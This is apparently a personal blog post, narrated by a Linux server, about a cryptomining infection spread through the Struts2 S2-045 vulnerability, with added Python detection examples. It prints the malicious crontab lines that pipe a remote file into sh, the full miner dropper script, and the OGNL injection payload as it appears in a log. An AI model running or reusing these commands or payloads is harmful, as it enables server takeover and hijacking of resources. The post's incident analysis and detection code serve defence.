Introduction

There are always people like this in the world. In 2011, a puzzled junior-year student posted a question on Zhihu asking whether there was any good financial investment advice for a junior with 6,000 yuan in hand. On this day in 2017 that question became popular on Zhihu, because one answer under it had received tens of thousands of likes: buy Bitcoin, save your wallet file, forget you ever had 6,000 yuan, and check back in five years.

The cause

I am a server, a Linux server. On the network edge there are the Tianqing and Hanma firewalls, and inside there is another firewall: a powerful combination, with so many layers that even I can't remember the exact number. For years I lived carefree and felt a little smug about it, and yet it was precisely me that was relentlessly attacked.

That morning my head felt a little feverish, so I hurried to run top:

top - 20:07:49 up 70 days,  8:53,  2 users,  load average: 5.71, 5.07, 2.93
Tasks: 200 total,   1 running, 199 sleeping,   0 stopped,   0 zombie
%Cpu(s): 50.2 us,  0.1 sy,  0.0 ni, 49.7 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
KiB Mem : 65401524 total, 36266252 free, 13198040 used, 15937232 buff/cache
KiB Swap: 32834556 total, 32803700 free,    30856 used. 51442368 avail Mem

  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
17257 root      20   0  591340  15220    556 S 599.7  0.0  67:13.74 atd
15768 root      20   0 15.369g 2.319g  18048 S   1.7  3.7   4:10.49 java

There was a strange process, atd, using nearly 600% CPU. Running ps -ef | grep atd:

[root@itstyle tmp]# ps -ef|grep atd
root     17257     1 99 19:56 ?        01:22:31 ./atd -c trtgsasefd.conf -t 6
root     17475 17165  0 20:10 pts/0    00:00:00 grep --color=auto atd

Then find / -name atd locates where the binary is stored:

[root@itstyle tmp]# find / -name atd
/var/tmp/atd

kill -9 17257 forcibly terminates the atd process immediately.

The fever went down, but unfortunately, within a few minutes it flared up again: atd was running once more.

Killed, and then back again; there must be a scheduler somewhere. Check the scheduled tasks with crontab -l:

[root@itstyle tmp]# crontab -l
*/20 * * * * wget -q -O - http://5.188.87.11/icons/logo.jpg | sh
*/19 * * * * curl http://5.188.87.11/icons/logo.jpg | sh
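The triage above (top, ps, crontab -l) can be automated as a small check that flags the two things that gave this infection away: a cron entry that downloads something and pipes it straight into a shell, and a process that runs from a relative or temp path at high CPU. This is an added example, not code from the post; the crontab and ps output it parses are constructed samples modelled on what the post shows.

```python
import re

# Constructed samples modelled on the output shown in the post; not captured from a live host.
CRONTAB_SAMPLE = """\
*/20 * * * * wget -q -O - http://5.188.87.11/icons/logo.jpg | sh
*/19 * * * * curl http://5.188.87.11/icons/logo.jpg | sh
0 3 * * * /usr/local/bin/backup.sh
"""
PS_SAMPLE = """\
UID        PID  PPID  C STIME TTY          TIME CMD
root     17257     1 99 19:56 ?        01:22:31 ./atd -c trtgsasefd.conf -t 6
root     15768 15100  1 12:01 ?        04:10:49 java -jar /opt/app/app.jar
root     17475 17165  0 20:10 pts/0    00:00:00 grep --color=auto atd
"""

# "fetch a URL with wget/curl and pipe the result into a shell"
FETCH_TO_SHELL = re.compile(r"\b(?:wget|curl)\b[^|]*https?://\S+.*\|\s*(?:ba)?sh\b")
TMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

def suspicious_cron_entries(crontab_text):
    """Return cron lines that download remote content and execute it in a shell."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and FETCH_TO_SHELL.search(line):
            hits.append(line)
    return hits

def suspicious_processes(ps_text, cpu_threshold=90):
    """Flag 'ps -ef' rows whose command runs from a relative or temp path,
    or whose C column (cumulative CPU %) is at or above the threshold."""
    findings = []
    for row in ps_text.splitlines()[1:]:          # skip the header row
        parts = row.split(None, 7)                # UID PID PPID C STIME TTY TIME CMD
        if len(parts) < 8:
            continue
        pid, cpu, cmd = parts[1], int(parts[3]), parts[7]
        reasons = []
        if cmd.startswith("./") or any(d in cmd for d in TMP_DIRS):
            reasons.append("runs from relative or temp path")
        if cpu >= cpu_threshold:
            reasons.append(f"cpu={cpu}")
        if reasons:
            findings.append((pid, cmd, reasons))
    return findings

if __name__ == "__main__":
    for line in suspicious_cron_entries(CRONTAB_SAMPLE):
        print("CRON :", line)
    for pid, cmd, why in suspicious_processes(PS_SAMPLE):
        print("PROC :", pid, cmd, "->", "; ".join(why))
```

On a real host, feed it the output of crontab -l for every user (root included) plus /etc/cron.d, since the post's entries lived in root's crontab.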

Fetching that "image" and looking at the network request in the browser devtools (F12) showed that the response actually contains the following script:

#!/bin/sh
rm -rf /var/tmp/bmsnxvpggm.conf
# kill competing miners: anything running from /tmp (except its own), known miner strings
ps auxf|grep -v grep|grep -v trtgsasefd|grep "/tmp/"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "bmsnxvpggm"|awk '{print $2}'|xargs kill -9
# only (re)install if none of its own process names is already running
ps -fe|grep -e "trtgsasefd" -e "ixcnkupikm" -e "jmzaazwiom" -e "erlimkvsmb" -e "pdnpiqlnaa" -e "zhoimvmfqo"|grep -v grep
if [ $? -ne 0 ]
then
echo "start process....."
chmod 777 /var/tmp/trtgsasefd.conf
rm -rf /var/tmp/trtgsasefd.conf
curl -o /var/tmp/trtgsasefd.conf http://5.188.87.11/icons/kworker.conf
wget -O /var/tmp/trtgsasefd.conf http://5.188.87.11/icons/kworker.conf
chmod 777 /var/tmp/atd
rm -rf /var/tmp/atd
rm -rf /var/tmp/sshd
# pick the AES-NI build of the miner if the CPU supports aes, otherwise the _na build
cat /proc/cpuinfo|grep aes>/dev/null
if [ $? -ne 1 ]
then
curl -o /var/tmp/atd http://5.188.87.11/icons/kworker
wget -O /var/tmp/atd http://5.188.87.11/icons/kworker
else
curl -o /var/tmp/atd http://5.188.87.11/icons/kworker_na
wget -O /var/tmp/atd http://5.188.87.11/icons/kworker_na
fi
chmod +x /var/tmp/atd
cd /var/tmp
# use roughly half the CPU cores as mining threads
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
nohup ./atd -c trtgsasefd.conf -t `echo $cores` >/dev/null &
else
echo "runing....."
fi

A pile of script, and the bastard even has rm -rf in it; this is going to kill me!! Lights on, Google the commands, and the following notes turn up on VirusTotal:

There was also a comment from four days earlier describing it as a script that downloads and launches a Bitcoin miner, spread via a Struts bug.

A chunk of the same code also turned up on a gov.LK site, vaguely related to Struts2:

Since some of the older projects were still using Struts2, I checked the logs and found the rumored OGNL injection:

org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException: the request doesn't contain a multipart/form-data or multipart/form-data stream, content type header is %{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "*/20 * * * * wget -q -O - http://91.230.47.40/icons/logo.jpg | sh\n*/19 * * * * curl http://91.230.47.40/icons/logo.jpg | sh" | crontab -; wget -q -O - http://91.230.47.40/icons/logo.jpg | sh').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

The attacker sent crafted content in the request to Struts, which evaluated it as OGNL, and that is what wrote the crontab entries.

The mining gang

Struts2 remote code execution vulnerabilities have been disclosed since 2010: S2-005, S2-009, S2-013, S2-016, S2-019, S2-020, S2-032, S2-037, devMode, and the S2-045 vulnerability Struts2 disclosed in early March 2017. Each disclosure was followed by a wave of Struts2 scanning attacks across the Internet.

This attack targets the Struts2 remote command execution vulnerability S2-045, CVE-2017-5638, officially rated high risk. The vulnerability lies in the file upload function based on the Jakarta plugin: a malicious user triggers it by modifying the Content-Type value in the HTTP request header. Attackers launch mass attacks against web application servers on the Internet and download malicious scripts that run Bitcoin mining programs, mainly affecting Linux servers.
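Because S2-045 lives entirely in the Content-Type header, the cheapest detection is to look at what that header contained whenever Struts logs the InvalidContentTypeException shown above. This added example (not from the post) scans such log lines for OGNL markers; the log lines are constructed, and the payload fragment in them is deliberately incomplete.

```python
import re

# Constructed log lines in the style of the Struts2 FileUploadBase error shown in the post.
LOG_SAMPLE = [
    "2017-03-10 02:14:07 WARN  ... InvalidContentTypeException: the request doesn't contain a "
    "multipart/form-data or multipart/form-data stream, content type header is "
    "%{(#_='multipart/form-data').(#cmd='id').(#p=new java.lang.ProcessBuilder(...)).(#p.start())}",
    "2017-03-10 02:15:11 WARN  ... InvalidContentTypeException: the request doesn't contain a "
    "multipart/form-data or multipart/form-data stream, content type header is text/plain",
    "2017-03-10 02:16:30 INFO  ... upload ok, content type header is multipart/form-data; boundary=----abc123",
]

CT_FIELD = re.compile(r"content type header is (.*)$")

# Indicators that a Content-Type value carries an OGNL expression rather than a media type.
OGNL_INDICATORS = {
    "expression_open": re.compile(r"[%$]\{"),            # %{ ... } / ${ ... }
    "ognl_variable": re.compile(r"#[A-Za-z_]\w*"),        # #cmd, #_memberAccess, ...
    "static_call": re.compile(r"@[\w.]+@\w+"),            # @java.lang.System@getProperty
    "process_exec": re.compile(r"ProcessBuilder|Runtime", re.I),
}
# A plain media type, optionally followed by parameters such as "; boundary=..."
VALID_MEDIA_TYPE = re.compile(r"^[\w.+-]+/[\w.+-]+(\s*;\s*[\w-]+=[^;]*)*$")

def content_type_indicators(value):
    """Return the names of the OGNL indicators present in a Content-Type value."""
    return sorted(name for name, rx in OGNL_INDICATORS.items() if rx.search(value))

def is_suspicious_content_type(value):
    # A value that is not a syntactically plain media type AND carries an
    # expression marker is treated as an injection attempt.
    return bool(content_type_indicators(value)) and not VALID_MEDIA_TYPE.match(value.strip())

def scan_struts_log(lines):
    """Return (line_no, content_type, indicators) for every flagged log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = CT_FIELD.search(line)
        if m and is_suspicious_content_type(m.group(1)):
            hits.append((n, m.group(1), content_type_indicators(m.group(1))))
    return hits

if __name__ == "__main__":
    for n, ct, why in scan_struts_log(LOG_SAMPLE):
        print(f"line {n}: {', '.join(why)} :: {ct[:60]}")
```

The same is_suspicious_content_type check can sit in a WAF rule or a servlet filter in front of an unpatched Struts2 instance as a stopgap, but it is no substitute for the upgrade described in the next section.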

After investigating and searching around, this looks like an organized, disciplined mining gang. Below are the source IP addresses. Ah, the evil Soviet revisionists: their ambition to destroy us never dies.

Solution

Upgrade Struts2 to 2.5.10. This high-risk vulnerability was already fixed in the March update, so be sensible and upgrade quickly. If you really don't want to upgrade, well, it doesn't matter much anyway: it's only mining, it won't break anything of yours.

But what if next time they don't just mine? What then? The fever won't be so simple. Many companies' production deployments are not very standard; maybe all the programs are started as root?

How the injection works

Finally, I think this is the question everyone is most concerned about: many friends must want to know how the hacker got in.


They say that if your heart is sincere enough, you can find a pawnshop on West Geda Mountain; go in, and you can change your life. Actually, I don't know.

Author: Xiao Qi

Reference: https://blog.52itstyle.com

Sharing is a happy experience, and it also records my personal growth. Most of these articles are summaries of work experience and daily learning. Given the limits of my own understanding, I ask you to correct me so that we can make progress together.